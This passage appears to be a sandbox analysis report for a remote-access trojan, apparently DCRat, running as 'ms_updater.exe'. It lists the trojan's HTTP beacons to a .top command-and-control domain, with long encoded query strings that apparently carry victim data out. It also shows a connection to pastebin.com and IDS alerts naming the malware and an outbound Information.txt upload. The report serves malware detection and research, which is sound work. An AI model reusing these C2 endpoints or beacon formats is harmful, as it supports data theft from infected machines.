2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nIlZDOkFTNiZGNwMTOlFjYkljM4IDNlFjN2UDMwUWOlVzYlZWOkFmYlJiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&b198abe6c77070427ef5e91e8d5ed825=d1nI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI1IDN0E2NlJTZ5IzY5QDMxEDM4QGOkZWOwATMhVjZmBTM1QmZxkDO2IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOisHL9JCMYZWa4oWS2k0QOlGZUpVaOdlW410VOpXWE10MRd1T41UbZRTWHpFMZpmW6VkeNxmSU5EejpmT4dmaaRzYE9Uaz52TpV0RkhmUFRGNW1WSzVlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUarxWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZJpXTnd3VZVXOXFmeOhlWtlTbjFlQ550ZNNDZ2JVbiBHZslkNJl2YspFbiBHZsl0cw4WS1x2RilnVtFldVd0Y2pEWkZkSp9UaV1mY2BHWaRHbHRWa3lWS3FERNdXQE1UavpWSzZ0RkpXOHNWa3lWS1UzVZRnSYpFSCNFTnF1VaBnWXFmaWd0Y6J0QkZXNrlkNJlnW5lTbJNXS51EMnpmT1dGRMRzZU1Ee0MUTxkUaPlWTyI2cKNETpVVRSl2bqlUNKhEZ1Z1MipmSDxUaVJzY6Z1RTl2bqlUd5cVYuZVbjl2dplUdsdVWOJ0UihmQDRWeW5mWyVzVZlnWrlkNJNVZwwmMZl2dplUMjpGT0ElaMNTRqxEMnpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI5MWYhJzMzUGZyYGZ3ETN3YzMhN2NzI2N0YzYiVzMiJGOmNTM1kzNyIiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&4b3611644f70fc2d5fba382ed48274b0=0VfiIiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
2804 | ms_updater.exe | GET | 200 | 104.21.1.107:80 | http://714745cm.nyashland.top/nyashsupport.php?mb2255vFyJmqs0vi1oEkF3=9dM5&8a43ab91d2d0ada45cd5ce27b80065c2=QNxczMhhTMwADM2AzNyMDM3YjZlRmM4kjZ4AjZkRTNhZDNmFTM5gTM2MTMyMTNzkDNyYzN4kTO&024ace78b46de9dec7d33cd74bf374d2=QMxkjNmNWZ2YjMyMzN4Y2N0cTZzUzMjRzY0MmZzMjY5YGZiFGM4QTY&9d68fd20db10d46579acac1fdc533db7=d1nIPBHRkxGeHJGakZUS2JFSjVjSzE1ZNhVWJBXUE9EcERGb4dkYoRmRJxmTYlVa1cVY25UbD5ENr9EMWdkYzZkMWdWUYplbShVYpBXUE9EcERGb4dkYoRmRJRDdyI2SwcGV2EFWaNHeXlFWCNEZ6ZlbjBDcRR0TwREZsh3RihGZGlkeWhkW2hGWatEMnRlNRhlWzh3VZhlQTFmdKNjYaBXUE9EcERGb4dkYoRmRJlmVyY1Z0ADVVBXUE9EcERGb4dkYoRmRJRXOHRWdGdUYRBXUE9EcERGb4dkYoRmRJlmVyY1ZVJTW1ZUbiBnSrNkT0s2TwY1RiNnRyY1Z0cVY1lTbVtEMnRlNRhlWzh3VZhlQ5FWdsdEV1lTbjVFcRR0TwREZsh3RihGZGlkcOhVWOZ0RkxWMrNkT0s2TwY1RiNnRyY1ZnJzYo5UbXtEMnRlNRhlWzh3VZhlQ5JWeW1mY2FzaD5ENr9EMWdkYzZkMWdWVtNmdOtmYwljMZxmUYFWTwFFRPBHRkxGeHJGakZUS6ZFSaZHaYJ1SwcGV2EFWaNHeXlFWCNlYxYVbjxGaHRmRwFFRPBHRkxGeHJGakZUS0ZlbjBjTXp1cWt2QORzaPBjVHJ2cGJjVnVVbjZnTFFmeGdkULBzZUZTUYp1c4dVWYJUaiBXOykFbShVZDBXUE9EcERGb4dkYoRmRJxmSzIGR1cVY250RkBnSrNkT0s2TwY1RiNnRyY1ZNdVY0lzRkJEcRR0TwREZsh3RihGZGlUNKNjY0pEWRtEMnRlNRhlWzh3VZhlQTpla1cVW1xWbRJiOiYmZ3UmM5EDN3kzM4UTZzYzN2IWO2ImMxUWMyImY2MzNiwiI0YGO5gjMmZGMjZjYyYmNmFTYhBTOkBjZkNzNhhjYyM2Y1MWMjdzM3IiOiATM2QzY4UmNkhzM5EWN0IGZ0IGNhRjN2Q2YmJzN3QTZiwiIyE2N2ImZ3MDMiVGO3QGZ1cjNiFjN0YGMyUWO3EWM4kDOzQmYyETO5IiOiUTN0EGM4cTN2UTM3YDZklTZjhTMhVmNwYjN3ADO0gTOis3W | unknown | text | 104 b | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | unknown |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
2804 | ms_updater.exe | 104.20.68.143:443 | pastebin.com | CLOUDFLARENET | — | unknown |
2804 | ms_updater.exe | 104.21.1.107:80 | 714745cm.nyashland.top | CLOUDFLARENET | — | unknown |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| unknown |
714745cm.nyashland.top |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.top domain - Likely Hostile |
— | — | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
— | — | Potentially Bad Traffic | ET INFO HTTP Request to a *.top domain |
— | — | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |